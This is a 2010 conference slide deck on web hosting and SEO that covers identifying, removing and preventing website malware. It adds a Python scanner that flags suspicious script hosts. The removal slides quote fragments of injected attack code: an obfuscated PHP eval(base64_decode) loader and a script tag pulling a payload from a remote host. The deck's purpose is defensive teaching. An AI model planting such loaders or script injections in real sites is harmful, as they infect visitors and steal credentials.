Hosting & SEO
Scott Hendison
Search Commander, Inc.
SEO Automatic
About Scott Hendison
• Began “hosting” websites in 1997 with one server in
our retail computer store, with standard DSL
• Grew to 11 servers then switched to a sort of
“datacenter co-op” a few years ago, all in the same
local facility in Gresham, Oregon.
• Not our primary business, but we still host over 1000
domains today, as well as maintain end-user hosting
accounts on several major hosts.
Web Hosting and SEO
• I've been on this panel three times and discussed –
– shared vs. dedicated servers
– Static vs. shared IP addresses
– Apache 1 vs Apache 2
– Apache vs. Windows
– .htaccess
– mod_rewrite
– Windows IIS rewriting options
– Server speed and performance
– and other riveting subjects trying to better relate to SEO
Web Hosting and SEO
Speed and Performance
• I “predicted” at Pubcon 2009 that speed will soon matter
for organic, then Matt Cutts announced next day
• Not a risky prediction, considering Adwords Quality Scores
• Speed as ranking factor began “counting” April 9, 2010
• Google has two great tools
– Page Speed for Firefox – (download inside Webmaster Tools)
– Google Chrome (right click in Chrome and “inspect element”)
But I’m Not Talking About Speed
• Far more important
• The #1 killer of websites
• The thing that drives visitors away in droves
• Drains PPC money as fast as possible
• Google stops people from even arriving at your site!
• I’m talking about…
Malware
• Nothing can fully protect users from getting viruses
• Viruses can steal the BEST passwords & logins
• If you don’t get one, contractors, employees or family
probably will, infecting your network.
• People should use index cards and a fireproof safe
• But that’s pretty unrealistic, so learn to deal with disasters
Malware identification
• Nearly 15% of “our” sites were hacked in 2010
• Most were self-inflicted through laziness and stupidity
• The hacks really didn’t vary all that much
• Getting rid of hacks can be a headache
• Getting back into Google isn’t very difficult
• Protecting yourself FROM hacks is getting easier, but…
• Sadly, the hacking keeps getting easier…
Malware
• Identification
• Removal
• Prevention
Identification
• You can get notified by a client or customer
• You discover it in a browser or AV warning
• You can see your site flagged in the SERPS
• You can get notified by Google WMT – (sometimes)
Malware Warnings
Warnings in the SERPS!
Interstitial Page
#1 Conversion Killer
• Nothing hurts you more than if people won’t
come to your site in the first place.
• Once you’ve identified a problem, what can
you do?
– Clean up the offending code
– Beg Google for a clean bill of health
Removal
• Most hacks we saw were pretty similar
• Cross Site Scripting (XSS) and SQL Injection
• Adding links and adding hosted scripts
• Hackers want to add links to your site
• Hackers want to add scripts to infect users with
viruses which in turn, steal more passwords
• Not too technical - Look for strange javascripts!
Removal
• If WMT is no help, then look at files manually
• Use backups and file comparison tools
• Check recent change dates
• Look for things that don’t belong, often in
pages named index, home, and default - in
.php and .html extensions
• Look in headers and footers too
Removal
<?php
eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp
KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY
<snip>
XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203
Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK
CRfUE9TVFsnZSddKSk7')); ?>
(<snipped> goes on for dozens of lines )
Removal
• Usually index, home, header and footer –
<script
src=http://domainX.ac.jp/course/VIVID.php
></script>
• And in most or all javascript files -
document.write('<script
src=http://domainX.ac.jp/course/VIVID.php
></script>');"
Removal
• Not all that complicated, just tedious.
• Search files for <script src=http:// and make
sure you recognize them all, and search for
eval(base64 too.
• Overly simplistic to say “clean it up” but others
have likely had your same problem.
• Google for it w/ quotes to find YOUR exact code.
• Get a quick look at your site w/ free tool at
http://UnmaskParasites.com
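The file search described on this slide, as an added example (not code from the original deck): it reports `<script src=...>` tags whose host is not on a list you recognise, any `eval(base64_decode(`, and whether the file changed recently. `KNOWN_HOSTS`, the 30-day window and the sample files are assumptions constructed for illustration.

```python
import re
import time
from pathlib import Path

SCAN_EXTS = {".php", ".html", ".htm", ".js"}
# Assumption: hosts you knowingly load scripts from; anything else is reported.
KNOWN_HOSTS = {"ajax.googleapis.com"}

# src= may be unquoted, as in the injected tag shown on the slides.
SCRIPT_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)

# Constructed sample files modelled on the slides; the base64 is just "constructed".
INJECTED = "<script src=http://domainX.ac.jp/course/VIVID.php ></script>"
SAMPLES = {
    "index.php": "<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n<h1>Home</h1>\n",
    "footer.html": "<p>(c) 2010</p>\n" + INJECTED + "\n",
    "js/menu.js": "var open = false;\ndocument.write('" + INJECTED + "');\n",
    "about.html": '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>\n',
}


def scan_text(text, known_hosts=KNOWN_HOSTS):
    """Return (line_no, reason) findings for one file's contents."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for host in SCRIPT_SRC.findall(line):
            if host.lower() not in known_hosts:
                findings.append((no, f"unrecognised script host: {host.lower()}"))
        if EVAL_B64.search(line):
            findings.append((no, "eval(base64_decode("))
    return findings


def scan_tree(root, days=30, known_hosts=KNOWN_HOSTS):
    """Scan a copy of the site; map each flagged file to its findings and recency."""
    cutoff = time.time() - days * 86400
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXTS:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"), known_hosts)
        if hits:
            report[path.relative_to(root).as_posix()] = {
                "recent": path.stat().st_mtime >= cutoff,
                "findings": hits,
            }
    return report


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body))
```

Modification times can be reset by whoever changed the file, so treat `recent` as a hint and still compare flagged files against a known-good backup.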
Once You’re Clean
Write something like this –
Thank you for identifying our malware
problem, and we believe all is now cleaned
up. We have verified that we're clean using
an online scanner -
http://www.unmaskparasites.com - and
would appreciate a speedy resolution.
Thank you,
Scott Hendison
Once You’re Clean
• Document your process and improve it
• Get ready to have it happen again
• Begin to protect yourself – Get paranoid.
Prevention
• FTP Passwords
– Don't share FTP access – make new users instead.
– NEVER use a dictionary word in the password
– Use at least 8 characters (some people will say 20+)
– Mix Upper Case, Lower Case, numerals and symbols
– CHANGE passwords without telling your dev people
every few months.
• Stop using plain old FTP - WinSCP is free SFTP
Prevention
• Using a CMS?
• Find the documentation on locking it down
• Do ALL system updates
• Do ALL released security patches
• Routine maintenance (just like WMT & Analytics)
• More popular = more vulnerable, like WordPress
Prevention
• Nearly 8% of all sites are now WordPress*
• We work in WordPress 95% of the time
• Same thing that makes it great makes it riskier
• Amazing plugins have been developed for safety
• Common threats have easy solutions
* Supposedly said by Matt Mullenweg at one of the 2010 WordCamps, but I can’t prove it.
Prevention
• Total prevention may be impossible. Be prepared!
• Backup restoration sometimes faster than repair
• Hosts may keep backups 7 days, or even less!
• Get weekly (or daily) backups in place & off-host
• Store a year of monthly backups at AWS
• Document the entire restore process and TEST
• Your site hack is generally not the web host’s fault!
Take-aways
• FAR more important than your SEO
• Dig into Webmaster Tools malware area
• Change all FTP Passwords asap, & consider SFTP
• Check for updated versions on forms, and on
your CMS
• Get backup and restore processes in place NOW
Thank You
WordPress Lunch Table Thursday 1:30
Scott Hendison
Search Commander, Inc.
shendison@seoautomatic.com

2010 11 pubcon_hendison-hosting
